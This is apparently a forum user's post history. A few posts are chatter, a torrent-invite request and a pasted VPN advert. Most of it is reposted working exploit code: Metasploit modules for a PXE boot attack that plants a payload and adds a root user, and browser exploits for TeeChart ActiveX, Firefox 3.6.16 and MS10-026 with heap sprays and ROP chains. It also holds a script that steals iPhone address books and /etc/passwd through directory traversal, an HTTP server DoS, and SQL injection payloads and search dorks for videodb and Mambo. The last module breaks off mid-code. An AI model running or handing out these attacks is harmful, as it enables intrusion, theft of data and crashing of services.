Posts posted by Gonzalez
-
-
Contact the Support-Team at both hosts.
-Gonzalez
-
-
I'd like Snoop to be CEO.
-
Wu Tang Clan - Take it back.mp3
-Gonzalez
-
TECHNO & MINIMAL 07.02.2011 (HD)
-
dr_dre-the_wash_feat_snoop_dogg.mp3
-Gonzalez
-
foreign or Romanian?
Research
If it's iptorrents or demonoid I don't want it. If it's another one, PM me please.
It's TorrentLeech.
If you have a spare one, let me know by PM.
Thanks
-Gonzalez
-
Try: https://www.cryptocloud.com/
Why do you need us?? Military-grade 2048-bit Encryption: Protect yourself from surveillance, eavesdroppers, websites monitoring your activities and hackers. Safeguard your data and privacy online!
- Bypass government / university / ISP Internet firewalls or proxies and access any website on the Internet (including Facebook, YouTube, Twitter, Flickr, Picasa, Tumblr, DropBox and FourSquare)
- Are you an expat? Cryptocloud gives you back full access to VoIP services (including Skype) in Dubai, China, Oman, Egypt and many other countries!
- Need a global reach? Our servers span multiple countries and jurisdictions, including the US, UK, Netherlands, Switzerland, Russia, Germany and Luxembourg. Change your location and IP address quickly and easily!
- Watch US-only American TV (Hulu, ABC, Comedy Central) and listen to US-only online radio (Last.fm, Pandora, Spotify) even if you don't live in the US!
- Watch UK TV (BBC) even if you don't live in the UK!
- Watch French, German and Swiss TV even if you don't live in those countries!
- On the go? Each subscriber receives two accounts – use CryptoCloud from two different computers at the same time!
- Crossplatform: Compatible with Windows (XP, Vista, 7), Linux and Mac OS X
- Mobile: Compatible with iPhone, iPod, iPad and Android in both 3G and WiFi modes!
- Anonymous P2P: We are the ONLY VPN provider that supports P2P protocols (eMule, KAD, torrents) and port forwarding! Enjoy uncapped speeds, unlimited transfers, and no connection logs kept whatsoever!
- We accept PayPal, Google Checkout, Amazon SimplePay, LibertyReserve, AlertPay as well as all major credit cards (US and International). If you would like to pay by BitCoin, Western Union, mail-in cash, bank transfer or money order, please send an email to support@cryptocloud.com. We'll make sure your account gets activated immediately while we receive your payment!
Cryptocloud employs robust, opensource security technology to protect all of your internet applications from surveillance: web, email, IM, VoIP, p2p - every packet.
Route around censorship and limitations like packet shaping, content filtering, traffic logging, and protocol limits - make your own 'net neutrality'.
-Gonzalez
-
nice share
-
SEO, promotion on Twitter, Facebook, a Yahoo group etc.
seo, seo, seo
-
##
# $Id: pxexploit.rb 13493 2011-08-05 17:10:27Z scriptjunkie $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/proto/tftp'
require 'rex/proto/dhcp'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::TFTPServer
def initialize
super(
'Name' => 'PXE exploit server',
'Version' => '$Revision: 13493 $',
'Description' => %q{
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a Linux kernel and initrd into memory that
reads the hard drive, placing the payload on any Windows partition seen
and adding a uid 0 user with username and password metasploit to any
Linux partition seen.
},
'Author' => [ 'scriptjunkie' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13493 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 4500,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal',
{
}
],
],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'DefaultTarget' => 0
)
register_options(
[
OptInt.new('SESSION', [ false, 'A session to pivot the attack through' ])
], self.class)
register_advanced_options(
[
OptString.new('TFTPROOT', [ false, 'The TFTP root directory to serve files from' ]),
OptString.new('SRVHOST', [ false, 'The IP of the DHCP server' ]),
OptString.new('NETMASK', [ false, 'The netmask of the local subnet', '255.255.255.0' ]),
OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ])
], self.class)
end
def exploit
if not datastore['TFTPROOT']
datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
end
datastore['FILENAME'] = "update1"
datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them!
# Prepare payload
print_status("Creating initrd")
initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom'))
uncompressed = Rex::Text.ungzip(initrd)
payl = payload.generate
uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl
initrd = Rex::Text.gzip(uncompressed)
# Meterpreter attack
if framework.sessions.include? datastore['SESSION']
client = framework.sessions[datastore['SESSION']]
if not client.lanattacks
print_status("Loading lanattacks extension...")
client.core.use("lanattacks")
end
print_status("Loading DHCP options...")
client.lanattacks.load_dhcp_options(datastore)
1.upto(4) do |i|
print_status("Loading file #{i} of 4")
if i < 4
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
else
contents = initrd
end
client.lanattacks.add_tftp_file("update#{i}",contents)
end
print_status("Starting TFTP server...")
client.lanattacks.start_tftp
print_status("Starting DHCP server...")
client.lanattacks.start_dhcp
print_status("pxesploit attack started")
return
end
# normal attack
print_status("Starting TFTP server...")
@tftp = Rex::Proto::TFTP::Server.new
@tftp.set_tftproot(datastore['TFTPROOT'])
@tftp.register_file('update4',initrd)
@tftp.start
print_status("Starting DHCP server...")
@dhcp = Rex::Proto::DHCP::Server.new( datastore )
@dhcp.start
print_status("pxesploit attack started")
# Wait for finish..
@tftp.thread.join
@dhcp.thread.join
print_status("pxesploit attack completed")
end
end
-
#!/usr/bin/python
#----------------------------------------------------------------
#Software : iPhone/iPad Phone Drive 1.1.1
#Type of vulnerability : Directory Traversal
#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken)
#----------------------------------------------------------------
#Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8
#----------------------------------------------------------------
#Discovered by : Khashayar Fereidani
#Team Website : Http://IRCRASH.COM
#English Forums : Http://IRCRASH.COM/forums/
#Team Members : Khashayar Fereidani , Arash Allebrahim
#Email : irancrash [ a t ] gmail [ d o t ] com
#Facebook : http://facebook.com/fereidani
#Twitter : http://twitter.com/ircrash
#----------------------------------------------------------------
import urllib2

def urlread(url,file):
    url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
    u = urllib2.urlopen(url)
    localFile = open('result.html', 'w')
    localFile.write(u.read())
    localFile.close()
    print "file saved as result.html\nIRCRASH.COM 2011"

print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT -\n- Discovered by : Khashayar Fereidani -\n- http://ircrash.com/ -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
    url='http://'+url
if ((id>0) and (id<6)):
    file=f[id]
    urlread(url,file)
if (id==6):
    file=raw_input("Enter Local File Address : ")
    urlread(url,file)
-
#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link: http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit
# still works.
# Simple HTTPd is still affected by the bug. The executable must be
# compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.
import socket, sys
buf = "A" * 6000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))
s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()
-
DORK:allinurl:borrow.php?diskid=
DORK:allintitle:videodb
# Vendor: http://www.videodb.net/blog/
$ -----------#
| S3C0VERUN |
& ------------@
Along with this, I was able in some sites to determine that you can overwrite the database contents, and also if you look in the source you see their password, the server name and the db user. This is a problem because most likely the site could be taken over,
due to the fact the admin doesn't usually change passwords on the same box.
Vulnerable software is videodb.
This is an information disclosure vulnerability. It appears most sites running this are vulnerable and have the same database structure. I'm not sure if this is an old version or if it is
completely vulnerable; I'm downloading the new version now from source.
<?php
/**
* Borrow Manager
*
* Handles lending of disks
*
* @package videoDB
* @author Andreas Gohr <a.gohr@web.de>
* @version $Id: borrow.php,v 2.20 2008/05/12 13:01:12 andig2 Exp $
*/
require_once './core/functions.php';
require_once './core/output.php';
// check for localnet
localnet_or_die();
// permission check
permission_or_die(PERM_WRITE, PERM_ANY);
// borrowmanagement for single disk
$editable = false;
if (!empty($diskid))
{
if (check_permission(PERM_WRITE, get_owner_id($diskid,true)))
{
$editable = true;
if ($return) {
$SQL = "DELETE FROM ".TBL_LENT." WHERE diskid = '".addslashes($diskid)."'";
runSQL($SQL);
}
if (!empty($who)) {
$who = addslashes($who);
$SQL = "INSERT INTO ".TBL_LENT." SET who = '".addslashes($who)."', diskid = '".addslashes($diskid)."'";
runSQL($SQL);
}
$SQL = "SELECT who, DATE_FORMAT(dt,'%d.%m.%Y') AS dt
FROM ".TBL_LENT."
WHERE diskid = '".addslashes($diskid)."'";
$result = runSQL($SQL);
$who = $result[0]['who'];
$dt = $result[0]['dt'];
}
}
$WHERES = '';
if ($config['multiuser'])
{
// get owner from session- or use current user
session_default('owner', get_username(get_current_user_id()));
// build html select box
$all = strtoupper($lang['radio_all']);
$smarty->assign('owners', out_owners(array($all => $all), PERM_READ));
$smarty->assign('owner', $owner);
// if we don't have read all permissions, limit visibility using cross-user permissions
if (!check_permission(PERM_READ))
{
$JOINS = ' LEFT JOIN '.TBL_PERMISSIONS.' ON '.TBL_DATA.'.owner_id = '.TBL_PERMISSIONS.'.to_uid';
$WHERES .= ' AND '.TBL_PERMISSIONS.'.from_uid = '.get_current_user_id().' AND '.TBL_PERMISSIONS.'.permissions & '.PERM_READ.' != 0';
}
// further limit to single owner
if ($owner != $all) $WHERES .= " AND ".TBL_USERS.".name = '".addslashes($owner)."'";
}
// overview on lent disks
$SQL = "SELECT who, DATE_FORMAT(dt,'%d.%m.%Y') as dt, ".TBL_LENT.".diskid,
CASE WHEN subtitle = '' THEN title ELSE CONCAT(title,' - ',subtitle) END AS title,
".TBL_DATA.".id, COUNT(".TBL_LENT.".diskid) AS count, ".TBL_USERS.".name AS owner
FROM ".TBL_LENT.", ".TBL_DATA."
LEFT JOIN ".TBL_USERS." ON owner_id = ".TBL_USERS.".id
$JOINS
WHERE ".TBL_LENT.".diskid = ".TBL_DATA.".diskid
$WHERES
GROUP BY ".TBL_LENT.".diskid
ORDER BY who, ".TBL_LENT.".diskid";
$result = runSQL($SQL);
// check permissions
for($i=0; $i < count($result); $i++)
{
$result[$i]['editable'] = check_permission(PERM_WRITE, get_userid($result[$i]['owner']));
}
// prepare templates
tpl_page();
$smarty->assign('diskid', $diskid);
$smarty->assign('who', $who);
$smarty->assign('dt', $dt);
$smarty->assign('editable', $editable);
$smarty->assign('borrowlist', $result);
// display templates
tpl_display('borrow.tpl');
?>
ADDSLASHES IS THE PROBLEM. I ASSUME IT COULD BE MUCH WORSE IF HE MADE THIS MISTAKE. I URGE YOU ALL TO LOOK INTO THE CODE.
The problem here is the fact he is using addslashes, which can be bypassed with a valid multi-byte sequence ending in 0x5c, as described in Chris Shiflett's article.
If I must say, this could be either a good or a bad thing: it just throws an error, and the injection is possible on all of these.
Now what are we to do? This could be huge or small depending on whether it is used widely or just on a small scale, but this is the new code from sourceforge.
I believe this to be the script that caused the issue; most of the sites, including the makers' demo, use borrow, few others changed
-
=========================================
Mambo CMS 4.6.x (4.6.5) | SQL Injection
=========================================
1. OVERVIEW
Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection.
2. BACKGROUND
Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites.
3. VULNERABILITY DESCRIPTION
The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows an attacker to conduct an SQL Injection attack. This could allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
4. VERSIONS AFFECTED
Tested on Mambo CMS 4.6.5
5. PROOF-OF-CONCEPT/EXPLOIT
http://localhost/mambo/administrator/index2.php?limit=10&order[]=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid[]=on&zorder=-1 OR (SELECT 9999 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,112,101,58),(SELECT (CASE WHEN (9999=9999) THEN 1 ELSE 0 END)),CHAR(58,110,100,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&filter_authorid=62&hidemainmenu=0&option=com_typedcontent
6. SOLUTION
The vendor seems to discontinue the development. It is recommended to use another CMS in active development.
7. VENDOR
Mambo CMS Development Team
8. CREDIT
This vulnerability was discovered by Aung Khant, YGN Ethical Hacker Group :: Where Burmese Hackers were Born, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2010-11-31: notified vendor through bug tracker
2011-08-12: no patched version released up to date
2011-08-12: vulnerability disclosed
10. REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mambo4.6_x]_sql_injection
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip
#yehg [2011-08-12]
-
##
# $Id: teechart_pro.rb 13522 2011-08-11 11:17:30Z swtornio $
##
###
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super( update_info(info,
'Name' => 'TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference',
'Description' => %q{
This module exploits an integer overflow in TeeChart Pro ActiveX control. When
sending an overly large/negative integer value to the AddSeries() property of
TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the
value and is later directly trusted and called upon.
This module has been designed to bypass DEP only under IE8. Multiple versions
(including the latest version), dating back as far as 2001, are affected by
this vulnerability.
The following controls are vulnerable:
TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);
TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);
TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);
TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);
TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).
The controls are deployed under several SCADA based systems including:
Unitronics OPC server v1.3;
BACnet Operator Workstation Version 1.0.76
},
'License' => MSF_LICENSE,
'Author' =>
[
# twitter.com/net__ninja
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery/msf module
],
'Version' => '$Revision: 13522 $',
'References' =>
[
#[ 'CVE', '?' ],
[ 'OSVDB', '74446'],
[ 'URL', 'http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
# For exploitation we need to calculate a value for EDX:
# <target address> - EAX / 4 = address to place in edx via signed integer
# 0x0c0c0c0c - 0x023FB8F4 = 0x09CC5318 / 4 = 0x027314C6 = decimal: 41096390
[
'Windows XP SP0-SP3 (IE6/IE7)',
{
'Ret' => 0x027314C6
}
],
# Windows XP target + IE8 + JAVA = ASLR/DEP Bypass
# 0x09442020- 0x0326B8F4 = 61D672C/4 = 18759CB
[
'Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)',
{
'Ret' => 0x014E59CB,
# 0x09442020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x09441FF8
# get back to the 2nd of rop.
'Pivot' => 0x09441FF8
}
],
# Windows 7 target + IE8 + JAVA = ASLR/DEP Bypass
# 0x16672020 - 0x040AB8F4/4 = 0x049719CB
[
'Windows 7 + JAVA + DEP bypass (IE8)',
{
'Ret' => 0x049719CB,
# 0x16672020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x16671FF8
# get back to the 2nd of rop.
'Pivot' => 0x16671FF8
}
]
],
'DisclosureDate' => 'Aug 11 2011',
'DefaultTarget' => 0))
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
#Set target manually or automatically
my_target = target
if my_target.name == 'Automatic'
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2]
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[3]
end
end
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# align stack
retn = Rex::Text.to_unescape([0x7C3410C4].pack('V*'))
pop_pop_retn = Rex::Text.to_unescape([0x7C3410C2].pack('V*'))
# shellcode
sc = Rex::Text.to_unescape(p.encoded)
# Randomize ALL the javascript variable names.
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
j_applet = rand_text_alpha(rand(100) + 1)
if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
js = <<-EOF
var #{rand3} = unescape('#{sc}');
var #{rand4} = unescape('%u0c0c%u0c0c');
var #{rand5} = 20;
var #{rand6} = #{rand5} + #{rand3}.length;
while(#{rand4}.length < #{rand6}) {
#{rand4} += #{rand4};
}
var #{rand7} = #{rand4}.substring(0, #{rand6});
var #{rand8} = #{rand4}.substring(0, #{rand4}.length - #{rand6});
while((#{rand8}.length + #{rand6}) < 0x50000) {
#{rand8} = #{rand8} + #{rand8} + #{rand7};
}
#{rand10}=new Array();
for(#{rand9}=0; #{rand9}<200; #{rand9}++){
#{rand10}[#{rand9}] = #{rand8} + #{rand3};
}
function #{rand2}()
{
#{rand1}.AddSeries(#{target.ret});
}
EOF
end
#http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
if my_target.name =~ /IE8/
# thanks to corelanc0d3r & mona.py :^) for the universal aslr/dep bypass (msvcr71.dll)
# https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
rop_gadgets = [
my_target['Pivot'],# Pivot back EAX for ESP control
0x7C342643, # XCHG EAX,ESP; POP EDI; ; ADD BYTE PTR DS:[EAX],AL; POP ECX; RETN
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # Make EAX readable
0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
0x41414141, # EBP (filler)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # <- *&VirtualProtect()
0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
0x7c346c0b, # Slide, so next gadget would write to correct stack location
0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
0x41414141, # EDI (filler)
0x41414141, # will be patched at runtime (VP), then picked up into ESI
0x41414141, # EBX (filler)
0x7c376402, # POP EBP # RETN (msvcr71.dll)
0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0xfffffdff, # size 0x00000201 -> ebx, modify if needed
0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
0x7c354901, # POP EBX # RETN (MSVCR71.dll)
0xffffffff, # pop value into ebx
0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
0x7c34b8d8, # ROP NOP (-> edi)
0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x90909090, # NOPS (-> eax)
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
].pack('V*')
rop = Rex::Text.to_unescape(rop_gadgets)
custom_js = <<-EOF
function #{rand3}(){
#{rand5} = new heapLib.ie(0x20000);
var #{rand6} = unescape('#{rop}');
#{rand6} += unescape('#{sc}');
while(#{rand6}.length <= 0xffc) #{rand6} += unescape('#{retn}')
while(#{rand6}.length < 0x1000) #{rand6} += unescape('#{pop_pop_retn}')
var #{rand7} = #{rand6};
while(#{rand7}.length < 0x40000) #{rand7} += #{rand7};
#{rand8} = #{rand7}.substring(2, 0x40000 - 0x21);
for(var i = 0; i < 0x400; i++) {
#{rand5}.alloc(#{rand8});
}
}
function #{rand2}(){
#{rand3}();
#{rand1}.AddSeries(#{my_target.ret});
}
EOF
js = heaplib(custom_js)
end
content = <<-EOF
<object classid='clsid:FCB4B50A-E3F1-4174-BD18-54C3B3287258' id='#{rand1}' ></object>
<script language='JavaScript' defer>
#{js}
</script>
<body onload="JavaScript: return #{rand2}();">
<body>
</html>
EOF
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
-
##
# $Id: mozilla_mchannel.rb 13507 2011-08-10 05:58:02Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::FF,
:ua_minver => "3.6.16",
:ua_maxver => "3.6.16",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
'Description' => %q{
This module exploits a use-after-free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element's mChannel can be freed via the
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
becomes a dangling pointer and can be reused when setting the OBJECT's
data attribute. (Discovered by regenrecht). This module uses a heap spray
with a minimal ROP chain to bypass DEP on Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'regenrecht', # discovery
'Rh0' # metasploit module
],
'Version' => "$Revision: 13507 $",
'References' =>
[
['CVE', '2011-0065'],
['OSVDB', '72085'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],
['URL', 'http://www.mozilla.org/security/announce/2010/mfsa2011-13.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
},
'Targets' =>
[
[
'Firefox 3.6.16 on Windows XP SP3',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 10 2011'
))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
def generate_html(payload)
# DEP bypass using xul.dll
custom_stack = [
0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8
0x7c801ad4, # VirtualProtect
0xbeeff00d,
0xbeeff00d,
0x1003876B, # jmp esp
0x0c0c0048, # start address
0x00000400, # size 1024
0x00000040, # Page EXECUTE_READ_WRITE
0x0c0c0c00 # old protection
].pack("V*")
payload_buf = ''
payload_buf << custom_stack
payload_buf << payload
escaped_payload = Rex::Text.to_unescape(payload_buf)
#Random JavaScript variable names
js_element_name = rand_text_alpha(rand(10) + 5)
js_obj_addr_name = rand_text_alpha(rand(10) + 5)
js_sc_name = rand_text_alpha(rand(10) + 5)
js_ret_addr_name = rand_text_alpha(rand(10) + 5)
js_chunk_name = rand_text_alpha(rand(10) + 5)
js_final_chunk_name = rand_text_alpha(rand(10) + 5)
js_block_name = rand_text_alpha(rand(10) + 5)
#Reference: adobe_flashplayer_newfunction.rb
custom_js = <<-JS
#{js_element_name} = document.getElementById("d");
#{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);
#{js_obj_addr_name} = unescape("\\x0c%u0c0c");
var #{js_sc_name} = unescape("#{escaped_payload}");
var #{js_ret_addr_name} = unescape("%u0024%u0c0c");
while(#{js_ret_addr_name}.length+20+8 < 0x100000) {#{js_ret_addr_name} += #{js_ret_addr_name};}
var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,(0x48-0x24)/2);
#{js_chunk_name} += #{js_sc_name};
#{js_chunk_name} += #{js_ret_addr_name};
var #{js_final_chunk_name} = #{js_chunk_name}.substring(0,0x10000/2);
while (#{js_final_chunk_name}.length<0x800000) {#{js_final_chunk_name} += #{js_final_chunk_name};}
var #{js_block_name} = #{js_final_chunk_name}.substring(0,0x80000 - (0x1020-0x08)/2);
array = new Array()
for (n=0;n<0x1f0;n++){
array[n] = #{js_block_name} + #{js_sc_name};
}
#{js_element_name}.data = "";
JS
#Remove the extra tabs
custom_js = custom_js.gsub(/^\t\t/, '')
html = <<-HTML
<html>
<body>
<object id="d"><object>
<script type="text/javascript">
#{custom_js}
</script>
</body>
</html>
HTML
return html
end
end
-
##
# $Id: ms10_026_avi_nsamplespersec.rb 13555 2011-08-13 02:15:05Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow',
'Description' => %q{
This module exploits a buffer overflow in l3codecx.ax while processing
AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite
with 0's so the three least significant bytes of EIP saved on stack are
overwritten and shellcode is mapped using the .NET DLL memory technique pioneered
by Alexander Sotirov and Mark Dowd.
Please note on IE 8 targets, your malicious URL must be a trusted site in order
to load the .Net control.
},
'Author' =>
[
'Yamata Li', # Vulnerability Discovery
'Shahin Ramezany <shahin[at]abysssec.com>', # Vulnerability Analysis and Exploit
'juan vazquez', # Metasploit module
'Jordi Sanchez <jsanchez[at]0x01000000.org>', # Metasploit module - Help
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13555 $',
'References' =>
[
['CVE', '2010-0480'],
['OSVDB', '63749'],
['BID', '39303'],
['MSB', 'MS10-026'],
['URL', 'http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/'],
['URL', 'http://www.phreedom.org/research/bypassing-browser-memory-protections/']
],
'Payload' =>
{
'Space' => 4000
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'Targets' =>
[
# Target 0: Automatic
# Tested with:
# Windows XP SP3 English IE 6
# Windows XP SP3 English IE 7
# Windows XP SP3 English IE 8: The exploiting site must be a trusted
# site to load the .NET control
# .NET CLR required
[
'Windows XP SP3 Automatic',
{
'Platform' => 'win',
'Ret' => 0x72000000
},
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 13 2010'))
end
def exploit
# Embed our payload in a .Net binary
ibase = target.ret - 0x10000
shellcode = rand_text_alpha(target.ret - ibase - 0x2285)
shellcode << payload.encoded
#Use our own custom .Net binary, because we require a much bigger file
#to land our payload at the right place
opts = {
:template => 'template_dotnetmem.dll',
:text_offset => 0x1285,
:text_max => 0x20000,
:pack => 'a131072',
:uuid_offset => 135816
}
@dotnet_payload = Msf::Util::EXE.to_dotnetmem(ibase, shellcode, opts)
# Load our AVI file
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0480.avi")
f = File.open(path, "rb")
